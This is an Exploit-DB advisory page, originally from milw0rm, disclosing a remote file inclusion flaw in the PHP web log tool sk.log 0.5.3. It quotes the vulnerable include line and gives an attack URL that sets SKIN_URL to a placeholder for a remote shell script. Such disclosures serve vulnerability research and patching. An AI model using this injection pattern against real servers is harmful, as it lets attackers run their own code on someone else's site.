sk.log 0.5.3 - 'skin_url' Remote File Inclusion

EDB-ID:

4454


Author:

w0cker

Type:

webapps


Platform:

PHP

Date:

2007-09-24


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

?????__________________________________________?????
????????_____________________________________???????
???????????_________________________________????????
??????????????_____________________________?????????
????????????????__________________________??????????
???????????????????______________________???????????
?????????????????????___________________????????????
??????????????????????_________________?????????????
????????????????????????_______________?????????????
??????????????????????????_____________?????????????
___?????????????????????????__________??????????????
_____?????????????????????????________??????????????
________???????????????????????_______??????????????
___________??????????????????????_____??????????????
________________???????????????????___??????????????
_____________________???????????????__??????????????
___________________________????????????????????????_
_____________________???????????????????????????____
______________???????????????????????????????_______
___________???????????????????????????????????______
________????????????????????????????????????????____
______????????_____??????????????????????????????___
____?????????_______??????????????????????????????__
__???????????_______???????????????????????????????_
_?????????????_____?????????????????????????????????
????????????????????????????????????????????????????
????????????????????????????????????????????????????
????????????????????????????????????????????????????
????????????????????????????????????????????????????
_??????????????????????????????????????????????????_
__?????????????????????????????????????????????????_
_____?????????????????????????????????????????????__
_________????????????????????????????????????????___
_______________??????????????????????????????????___
_________________???????????????????????????????____
_________________???????????????????????????________
________________??????????_____ ??????????___________
_________________?????_________?????_________?????__
__________????_________????____________?????????____
__________?????????????????_____??????????__________
__________?????????????????___?????_________________
__________?????______??????_________________________
# sk.log  <=  Remote File Inclusion Vulnerability
#
#Dork::(
#
#Vuln Code
##################################################
#ERROR1:log.inc.php
#include_once( "$SKIN_URL/php/logdisplay.inc.php" );<<< rfi coded.
#
#Other Files:
#/php-inc/log.inc.php?SKIN_URL=[ShellScript]
##################################################
#Download:http://surfnet.dl.sourceforge.net/sourceforge/sklog/sk.log_v0.5.3.zip
#
################################################## 
####specialthanx:####KEZZAP66345########################
##################################################

# milw0rm.com [2007-09-24]